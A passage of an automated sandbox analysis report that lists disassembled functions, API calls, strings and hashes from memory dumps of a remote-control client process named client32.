erased=%d, idata->dead=%d, xrefs: 1106D293

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEventXinvalid_argumentstd::_wsprintf
String ID: ..\ctl32\Connect.cpp$erased=%d, idata->dead=%d
API String ID: 1787781242-2624497655
Opcode ID: 7e669e9a5a4f37c27c7146ff50ba6d66a74f2ada1778d74f9747df45e64f0b3c
Instruction ID: 04573714079795333ec223b70536839c78a5a0195139b0015b045f9e3d8978cb
Opcode Fuzzy Hash: 7e669e9a5a4f37c27c7146ff50ba6d66a74f2ada1778d74f9747df45e64f0b3c
Instruction Fuzzy Hash: CD318975E00296EFDB25CF50C880F9EB3B8AB45318F0085DAE54A6B241DB70EAC5CB61

Function 68C7FAD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,21B321B5), ref: 68C7FB04
std::_Xinvalid_argument.LIBCPMT ref: 68C7FB3E
SetEvent.KERNEL32(?), ref: 68C7FB69
LeaveCriticalSection.KERNEL32(00000000,00000000), ref: 68C7FBA4

Strings

list<T> too long, xrefs: 68C7FB39

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeaveXinvalid_argumentstd::_
String ID: list<T> too long
API String ID: 930337060-4027344264
Opcode ID: 1bd1fbf2fdd8f708cbb41970e40fd90156ebae114bb9b1082c4714afab2b99e3
Instruction ID: 29d7623d988b0874d99b03bf113e1d7654c8338a238733329cf29de0b87f59a6
Opcode Fuzzy Hash: 1bd1fbf2fdd8f708cbb41970e40fd90156ebae114bb9b1082c4714afab2b99e3
Instruction Fuzzy Hash: 6B317375604704DFC724CF68C894A6ABBF8FB4D314F50865EE96A97784E770E805CB60

Function 1106D197 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

Part of subcall function 1110C8A0: EnterCriticalSection.KERNEL32(?,62C07B5E,?,?,?,?,?,?), ref: 1110C8D4
Part of subcall function 1110C8A0: LeaveCriticalSection.KERNEL32(?,?,?), ref: 1110C911

SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
wsprintfA.USER32 ref: 1106D299
LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 1106D2BF

Strings

..\ctl32\Connect.cpp, xrefs: 1106D2AA
erased=%d, idata->dead=%d, xrefs: 1106D293

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEventwsprintf
String ID: ..\ctl32\Connect.cpp$erased=%d, idata->dead=%d
API String ID: 3430577181-2624497655
Opcode ID: acfe9df1836c1e9302e8be9c47d6b3a855bab0fd3b4b46642e96841f146edea2
Instruction ID: 536c81e74eca5bf7a4e2791cfcdf9f566333e3a1added10bfa629768b284d793
Opcode Fuzzy Hash: acfe9df1836c1e9302e8be9c47d6b3a855bab0fd3b4b46642e96841f146edea2
Instruction Fuzzy Hash: 21317A75E00296EFD725CF90C884F9EF7F9AB45314F00819AD54A9B241DB70E9C1CB61

Function 68C6BAC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 68C77D00: __vswprintf.LIBCMT ref: 68C77D26

Part of subcall function 68C65060: _free.LIBCMT ref: 68C6506A
Part of subcall function 68C65060: _malloc.LIBCMT ref: 68C65090

_free.LIBCMT ref: 68C6BB46

Part of subcall function 68C81BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68C81C13
Part of subcall function 68C81BFD: GetLastError.KERNEL32(00000000), ref: 68C81C25

Strings

UF=%d, xrefs: 68C6BB09
CMD=MESSAGERECEIVED, xrefs: 68C6BAE0
UN=%s, xrefs: 68C6BB3A
ID=%d, xrefs: 68C6BAF7

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
String ID: CMD=MESSAGERECEIVED$ID=%d$UF=%d$UN=%s
API String ID: 3180605519-2489130399
Opcode ID: 4a5024bf22d44f113e532cf1693ae285c259b91317ec0350a65f174e5caacad9
Instruction ID: 02a52922460fd66437e40c8353efda478c0b1f706fb178be999b97fc7c7dc1eb
Opcode Fuzzy Hash: 4a5024bf22d44f113e532cf1693ae285c259b91317ec0350a65f174e5caacad9
Instruction Fuzzy Hash: CE214ABA900209BADB11DBA4DD84EFF77BCEF44214F904515B906A7144FB30EA44C7B1

Function 68C6BB90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 68C77D00: __vswprintf.LIBCMT ref: 68C77D26

Part of subcall function 68C65060: _free.LIBCMT ref: 68C6506A
Part of subcall function 68C65060: _malloc.LIBCMT ref: 68C65090

_free.LIBCMT ref: 68C6BC16

Part of subcall function 68C81BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68C81C13
Part of subcall function 68C81BFD: GetLastError.KERNEL32(00000000), ref: 68C81C25

Strings

UF=%d, xrefs: 68C6BBD9
CMD=MESSAGEACK, xrefs: 68C6BBB0
UN=%s, xrefs: 68C6BC0A
ID=%d, xrefs: 68C6BBC7

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
String ID: CMD=MESSAGEACK$ID=%d$UF=%d$UN=%s
API String ID: 3180605519-89615960
Opcode ID: 74addc873067fb63dc2f94bebafa8573963d3195609d1cfb3c39a5dc8a2d6dc0
Instruction ID: 7d56977191d37c4877193bc7bf7fcc512e495e670e34d04bf958f90ee9f38cea
Opcode Fuzzy Hash: 74addc873067fb63dc2f94bebafa8573963d3195609d1cfb3c39a5dc8a2d6dc0
Instruction Fuzzy Hash: D7211ABA900209BADB11DBA4DD84EFF77BCEB44214F904515B906A7140FB34EA44C7F1

Function 68C62A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 68C62ACB
_strrchr.LIBCMT ref: 68C62ADA
_strrchr.LIBCMT ref: 68C62AEA
wsprintfA.USER32 ref: 68C62B05

Part of subcall function 68C62CE0: GetModuleHandleA.KERNEL32(NSMTRACE,68C62AB1), ref: 68C62CFA

Strings

HTCTL32, xrefs: 68C62B00, 68C62B0E, 68C62B15, 68C62B42

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Module_strrchr$FileHandleNamewsprintf
String ID: HTCTL32
API String ID: 2529650285-1670862073
Opcode ID: c227e65a113b2e3385dddeabe0a14135e1316c4bb3aab3e707ae0828d24397fe
Instruction ID: c05ab0200ae1a148891cc1cf111c4276a4ce641206a8eab5b837a5cb145cecc6
Opcode Fuzzy Hash: c227e65a113b2e3385dddeabe0a14135e1316c4bb3aab3e707ae0828d24397fe
Instruction Fuzzy Hash: 3E2108749442489FDB11DF388CA47EE7FB4DB4A31CF8400A9D99A5F142FA708986C791

Function 68C67DE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C67E0E
EnterCriticalSection.KERNEL32(68CAB898,?,?,?,00000000), ref: 68C67EB7
LeaveCriticalSection.KERNEL32(68CAB898,?,?,?,00000000), ref: 68C67ED0

Strings

RESULT, xrefs: 68C67E40
b, xrefs: 68C67EA2

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave_memset
String ID: RESULT$b
API String ID: 3751686142-4141403093
Opcode ID: 396477bb88fba95078a190370c1f23d5f1eb08b45b6fef3a021d6dfa8c498e83
Instruction ID: 9c6b18826843de8bf1e92adc669782714afe4d8682af700fb638a18938ef63f3
Opcode Fuzzy Hash: 396477bb88fba95078a190370c1f23d5f1eb08b45b6fef3a021d6dfa8c498e83
Instruction Fuzzy Hash: 19215EB1C00209AEDF50DFA4D8457AEBBF4FF09314F4045AAD419E7280FB759A949BA1

Function 68C6BE00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C6BE64
_strncpy.LIBCMT ref: 68C6BE9D

Strings

sv.slavetype == APP_SLAVE, xrefs: 68C6BE33
apptype == APP_SLAVE, xrefs: 68C6BE13
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 68C6BE0E, 68C6BE2E

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _memset_strncpy
String ID: apptype == APP_SLAVE$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$sv.slavetype == APP_SLAVE
API String ID: 3140232205-2748231828
Opcode ID: e0ee735760f684b3b5e6e2a3a929aded5705510f7d97465d28dbd0680632528a
Instruction ID: 9d0a18af802a1ed75789700ba977cbb147676def052c553c4de491b7ae126083
Opcode Fuzzy Hash: e0ee735760f684b3b5e6e2a3a929aded5705510f7d97465d28dbd0680632528a
Instruction Fuzzy Hash: B911CA7AE8071667EB004958AD45BEE3398AB1276DF810036FF18A73C1F371A9D583D6

Function 1113F370 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetProfileStringA.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 1113F39E
_memmove.LIBCMT ref: 1113F3ED

Strings

Device, xrefs: 1113F394
Windows, xrefs: 1113F399
,,LPT1:, xrefs: 1113F38F

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProfileString_memmove
String ID: ,,LPT1:$Device$Windows
API String ID: 1665476579-2967085602
Opcode ID: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
Instruction ID: bcd620f34367886d122ba7e5b4bc1f5e42e64e22dfa310253f00a50472163b57
Opcode Fuzzy Hash: 545c589ca3c1c67feaf2385bf7ba58e2cdbbd1510027cf68d9306f3142d9ecb6
Instruction Fuzzy Hash: 42112965A0425B9AEB108F24AD45BBAF768EF8520DF0040A8ED859714AEA316609C7B3

Function 68C7FDE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 68C7FE0A
EnterCriticalSection.KERNEL32 ref: 68C7FE19
LeaveCriticalSection.KERNEL32 ref: 68C7FE8C

Part of subcall function 68C7F540: InitializeCriticalSection.KERNEL32(68CACF98,21B321B5,?,?,?,?,?,68C9EFC8,000000FF), ref: 68C7F574
Part of subcall function 68C7F540: EnterCriticalSection.KERNEL32(68CACF98,21B321B5,?,?,?,?,?,68C9EFC8,000000FF), ref: 68C7F590
Part of subcall function 68C7F540: LeaveCriticalSection.KERNEL32(68CACF98,?,?,?,?,?,68C9EFC8,000000FF), ref: 68C7F5D8

Strings

Refcount.cpp, xrefs: 68C7FE76
p.second, xrefs: 68C7FE7B

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$CurrentInitializeThread
String ID: Refcount.cpp$p.second
API String ID: 2150084884-1554893322
Opcode ID: b4504a3fe1643d913e0f3aeb9ad1c1d676eb2caa43da7ef3b010b6b01e7a4832
Instruction ID: ac8a103a456ad5dae5e26c5333c6cdbb8c2c47027a3263df0e243f10d0bb66d9
Opcode Fuzzy Hash: b4504a3fe1643d913e0f3aeb9ad1c1d676eb2caa43da7ef3b010b6b01e7a4832
Instruction Fuzzy Hash: 052181B6900609EFCB11DFA4D881FEFB7B8FB19314F50422AE552A3640E7746605CBA1

Function 68C7B960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 63COMMON

Download Yara Rule

APIs

__strdup.LIBCMT ref: 68C7B997

Strings

NSMString.cpp, xrefs: 68C7B9FA
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 68C7B981, 68C7B9B3
IsA(), xrefs: 68C7B986, 68C7B9B8
*this==src, xrefs: 68C7B9FF

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: __strdup
String ID: *this==src$IsA()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 838363481-1357550281
Opcode ID: 03c81dee0abadb746efa7da63c09973146e700d4716b48b725851523e0d0b49c
Instruction ID: 4b97c17a0777eefce7f6ad38c33543b156cb720937c81cae802aac34888d547f
Opcode Fuzzy Hash: 03c81dee0abadb746efa7da63c09973146e700d4716b48b725851523e0d0b49c
Instruction Fuzzy Hash: 1911487564061E6FC710DF1DDC29E3AB7E89F9A31AF808025E9A897300F771A85147C2

Function 68C7FFC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57threadwindowsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 68C7FFD8

Part of subcall function 68C7DAC0: SetEvent.KERNEL32(00000000), ref: 68C7DAE4

WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 68C8000C

Part of subcall function 68C7FBC0: EnterCriticalSection.KERNEL32(?,?,77063550,68C8001D), ref: 68C7FBC8
Part of subcall function 68C7FBC0: LeaveCriticalSection.KERNEL32(?), ref: 68C7FBD5

PostMessageA.USER32(?,00000501,00000000,00000000), ref: 68C80034
PostThreadMessageA.USER32(?,00000501,00000000,00000000), ref: 68C8003B

Strings

Queue, xrefs: 68C7FFC4

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalMessagePostSectionThread$CurrentEnterEventLeaveObjectSingleWait
String ID: Queue
API String ID: 620033763-3191623783
Opcode ID: 8136ebcc8745031003dfcf992b83f140cb139397723e4eb3f0bc7a63d5f4990c
Instruction ID: 03ad0d4ff5da5ce3c741241f35f7ca3c57c0e561b17818a027ecb573d8e5dc2d
Opcode Fuzzy Hash: 8136ebcc8745031003dfcf992b83f140cb139397723e4eb3f0bc7a63d5f4990c
Instruction Fuzzy Hash: 6511C275681700DFDB219FA4DC94B1E37B4AB453ACF804029EA1597280EB70E801CB91

Function 11141070 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1114107C
_memset.LIBCMT ref: 11141098
GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 111410B6
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 111410DF

Strings

0, xrefs: 111410A8

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$Info$Count_memset
String ID: 0
API String ID: 162323998-4108050209
Opcode ID: 0c1e1fdabff6bfde52f05e2d3fca83c1d12d76b79eb12fdf68bc459e20492bd0
Instruction ID: 2bcd32ba99f467236d3458310ced708016d2ad859b25bc85d693658704d9c718
Opcode Fuzzy Hash: 0c1e1fdabff6bfde52f05e2d3fca83c1d12d76b79eb12fdf68bc459e20492bd0
Instruction Fuzzy Hash: E0016171A11219BBDB10DF95DD89FDEFBBCEB45758F108115F914E3140D7B0660487A1

Function 11141100 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,?,00000058,62C07B5E), ref: 11141118
wsprintfA.USER32 ref: 1114112E

Strings

..\ctl32\util.cpp, xrefs: 11141140
i < cchBuf, xrefs: 11141145
#%d, xrefs: 11141128

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

